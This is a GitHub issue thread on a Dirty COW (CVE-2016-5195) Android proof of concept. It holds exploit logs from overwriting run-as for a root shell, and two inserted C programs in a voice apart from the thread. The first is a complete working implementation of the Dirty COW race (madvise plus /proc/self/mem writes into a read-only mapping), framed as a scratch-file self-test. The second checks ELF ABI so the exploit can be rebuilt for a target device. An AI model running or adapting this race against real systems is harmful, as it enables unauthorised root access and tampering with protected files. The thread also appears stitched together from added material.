timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

My test results #16

Closed kgretzky closed 7 years ago

kgretzky commented 8 years ago

I've so far tested the PoC on two devices:

Sony Xperia Z2 Tablet (rooted, running CyanogenMod [11 I think]) - Android 4.4.4 : Status: Worked perfectly - overwrote run-as and was able to spawn a root shell, meaning no SELinux was present.

[*] mmap 0xb6ee0000
[*] exploit (patch)
[*] currently 0xb6ee0000=464c457f
[*] madvise = 0xb6ee0000 9680
[*] madvise = 0 1048576
[*] /proc/self/mem 1560281088 1048576
[*] exploited 0xb6ee0000=464c457f

Sony Xperia Z5 Compact (stock firmware, non-rooted) - Android 6.0.1 : Status: Not working - run-as was not overwritten. Tried increasing the LOOP define from 0x100000 to 0x10000000, as I thought maybe it needed more time to trigger the race condition, but still after several minutes there was no success and run-as remained unchanged.

[*] mmap 0xf6fcd000
[*] exploit (patch)
[*] currently 0xf6fcd000=464c457f
[*] madvise = 0xf6fcd000 14192
[*] madvise = 0 268435456
[*] /proc/self/mem -268435456 268435456
[*] exploited 0xf6fcd000=464c457f

I will later also check on a Samsung S5 and post the results here. Let me know if you need me to give you any more info.
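The three log lines that matter above are mmap, madvise and /proc/self/mem: the PoC maps the target read-only and private, one thread keeps discarding the private copy with madvise(MADV_DONTNEED), and another keeps writing through /proc/self/mem at the mapped address. The following C program is an added example, not code from the timwr/CVE-2016-5195 repository: it runs that same race against a throw-away file it creates in /tmp instead of run-as, then re-reads the file to see whether the write reached the page cache. The file name pattern, the payload string and the function names are choices made here for illustration. Build with `gcc -pthread`.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64   /* so a 32-bit build can seek to high addresses */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added self-test, not code from the timwr/CVE-2016-5195 repository. */
struct race_ctx {
    void *map;            /* MAP_PRIVATE, PROT_READ mapping of the target file */
    size_t map_len;
    const char *payload;  /* bytes written through /proc/self/mem */
    size_t payload_len;
    long iterations;
    int mem_fd;           /* /proc/self/mem opened O_RDWR */
};

static void *madvise_loop(void *arg)
{
    struct race_ctx *c = arg;
    for (long i = 0; i < c->iterations; i++)
        madvise(c->map, c->map_len, MADV_DONTNEED); /* throw away the private copy */
    return NULL;
}

static void *write_loop(void *arg)
{
    struct race_ctx *c = arg;
    for (long i = 0; i < c->iterations; i++) {
        /* write at the mapping's address; on a vulnerable kernel this can
           land on the page-cache page instead of the private COW copy */
        if (lseek(c->mem_fd, (off_t)(uintptr_t)c->map, SEEK_SET) < 0 ||
            write(c->mem_fd, c->payload, c->payload_len) < 0)
            break; /* writes to /proc/self/mem refused here (EIO etc.) */
    }
    return NULL;
}

/* Returns 1 if the file on disk was modified (race landed: kernel vulnerable),
 * 0 if it stayed intact after `iterations` rounds, -1 if setup failed. */
int dirtycow_self_test(const char *payload, long iterations)
{
    static const char original[] =
        "ORIGINAL CONTENT ORIGINAL CONTENT ORIGINAL CONTENT ORIGINAL\n";
    char path[] = "/tmp/dirtycow_selftest_XXXXXX"; /* assumed scratch location */
    size_t len = sizeof original - 1, plen = strlen(payload);
    int rc = -1, fd, ro_fd = -1, mem_fd = -1;
    void *map = MAP_FAILED;
    struct race_ctx ctx;
    pthread_t t1, t2;
    char buf[sizeof original];

    if (plen == 0 || plen > len) return -1;
    if ((fd = mkstemp(path)) < 0) return -1;
    if (write(fd, original, len) != (ssize_t)len) goto out;

    /* map it read-only and private, the way the PoC maps run-as */
    if ((ro_fd = open(path, O_RDONLY)) < 0) goto out;
    map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, ro_fd, 0);
    if (map == MAP_FAILED) goto out;
    if ((mem_fd = open("/proc/self/mem", O_RDWR)) < 0) goto out;

    ctx = (struct race_ctx){ map, len, payload, plen, iterations, mem_fd };
    if (pthread_create(&t1, NULL, madvise_loop, &ctx) != 0) goto out;
    if (pthread_create(&t2, NULL, write_loop, &ctx) != 0) {
        pthread_join(t1, NULL);
        goto out;
    }
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    /* read the file back with a plain pread, bypassing our private mapping */
    if (pread(fd, buf, len, 0) != (ssize_t)len) goto out;
    rc = memcmp(buf, original, len) == 0 ? 0 : 1;
out:
    if (mem_fd >= 0) close(mem_fd);
    if (map != MAP_FAILED) munmap(map, len);
    if (ro_fd >= 0) close(ro_fd);
    close(fd);
    unlink(path);
    return rc;
}

int main(void)
{
    /* 0x100000 is the LOOP value mentioned in this thread */
    int r = dirtycow_self_test("DIRTY", 0x100000);
    printf("self-test: %s\n",
           r == 1 ? "file modified, kernel is VULNERABLE" :
           r == 0 ? "file intact, race did not land" :
                    "could not run the test");
    return r < 0 ? 2 : r;
}
```

Only a result of 1 is conclusive. The race is probabilistic, so 0 after a fixed number of rounds says the race did not land on this run, not that the kernel is fixed; that is also why a negative result like the Z5 one above does not on its own tell you whether the device is affected or whether the exploit binary simply never reached the target.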

timwr commented 7 years ago

Can you try `make test`? It could be the wrong architecture.
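One quick way to check the architecture suggestion before re-running the race for minutes: compare the ELF class (32- or 64-bit) and e_machine of the device's run-as with those of the binary the PoC writes into it. The `464c457f` the PoC prints is the first word of the mapped file read little-endian, i.e. the bytes 7f 45 4c 46, "\x7fELF"; the fields that identify the architecture sit a few bytes further in. The following C is an added example, not code from the timwr/CVE-2016-5195 repository; the two sample headers are constructed for the test and the function names are chosen here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the timwr/CVE-2016-5195 repository. */
#define EM_386     0x03
#define EM_ARM     0x28
#define EM_X86_64  0x3E
#define EM_AARCH64 0xB7

struct elf_info {
    int class_bits;     /* 32 or 64, from e_ident[EI_CLASS] */
    int little_endian;  /* from e_ident[EI_DATA] */
    uint16_t machine;   /* e_machine */
};

/* The PoC logs the first 32-bit word of the mapping; 0x464c457f as a
   little-endian word is the byte sequence 7f 45 4c 46 = "\x7fELF". */
int word_is_elf_magic(uint32_t word_le)
{
    return word_le == 0x464c457fu;
}

/* Parse just enough of an ELF header to identify the ABI. Returns 0 on
   success, -1 if the buffer is too short or not an ELF file. */
int elf_describe(const unsigned char *buf, size_t len, struct elf_info *out)
{
    if (len < 20 || memcmp(buf, "\x7f" "ELF", 4) != 0) return -1;
    if (buf[4] != 1 && buf[4] != 2) return -1;   /* EI_CLASS: ELFCLASS32/64 */
    if (buf[5] != 1 && buf[5] != 2) return -1;   /* EI_DATA: LSB/MSB */
    out->class_bits = (buf[4] == 2) ? 64 : 32;
    out->little_endian = (buf[5] == 1);
    /* e_ident is 16 bytes, e_type 2 bytes, so e_machine is at offset 18
       for both ELF32 and ELF64 headers */
    out->machine = out->little_endian
        ? (uint16_t)(buf[18] | (buf[19] << 8))
        : (uint16_t)((buf[18] << 8) | buf[19]);
    return 0;
}

int elf_same_abi(const struct elf_info *a, const struct elf_info *b)
{
    return a->class_bits == b->class_bits &&
           a->little_endian == b->little_endian &&
           a->machine == b->machine;
}

const char *elf_machine_name(uint16_t m)
{
    switch (m) {
    case EM_ARM:     return "ARM (32-bit)";
    case EM_AARCH64: return "AArch64";
    case EM_386:     return "x86";
    case EM_X86_64:  return "x86-64";
    default:         return "other";
    }
}

/* Read the first 64 bytes of a file on disk (e.g. /system/bin/run-as or the
   payload binary) and describe it. */
int elf_describe_file(const char *path, struct elf_info *out)
{
    unsigned char hdr[64];
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return elf_describe(hdr, n, out);
}

/* Constructed sample headers for the self-check; not taken from any device.
   Bytes 0-15: e_ident, 16-17: e_type (ET_EXEC), 18-19: e_machine. */
static const unsigned char sample_arm32[20] = {
    0x7f,'E','L','F', 1,1,1,0, 0,0,0,0,0,0,0,0, 2,0, EM_ARM,0 };
static const unsigned char sample_arm64[20] = {
    0x7f,'E','L','F', 2,1,1,0, 0,0,0,0,0,0,0,0, 2,0, EM_AARCH64,0 };

int main(int argc, char **argv)
{
    struct elf_info target, payload;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <target-binary> <payload-binary>\n", argv[0]);
        return 2;
    }
    if (elf_describe_file(argv[1], &target) < 0 ||
        elf_describe_file(argv[2], &payload) < 0) {
        fprintf(stderr, "could not parse ELF headers\n");
        return 2;
    }
    printf("target:  ELF%d %s\npayload: ELF%d %s\n",
           target.class_bits, elf_machine_name(target.machine),
           payload.class_bits, elf_machine_name(payload.machine));
    printf("%s\n", elf_same_abi(&target, &payload)
           ? "ABI matches" : "ABI MISMATCH: rebuild the payload for the target");
    return elf_same_abi(&target, &payload) ? 0 : 1;
}
```

Run it on the device with `adb shell` (or adb pull the binaries and run it on the host) against `/system/bin/run-as` and the payload the PoC writes. A mismatch in class or machine means the overwrite, even if it landed, would not give a working run-as, and the exploit should be rebuilt for the target ABI before spending more time on loop counts.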